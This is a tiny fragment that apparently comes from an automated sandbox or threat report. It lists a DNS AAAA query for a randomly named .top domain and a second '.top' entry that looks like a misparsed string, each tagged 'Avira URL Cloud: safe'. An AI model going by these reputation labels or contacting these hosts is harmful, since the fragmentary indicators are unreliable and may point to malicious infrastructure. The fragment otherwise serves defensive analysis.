QUERY|rd|AAAA|IN|home.fvtekk5pn.top true
  • Avira URL Cloud: safe
 unknown
CTR-DRBG.top true
  • Avira URL Cloud: safe
 unknown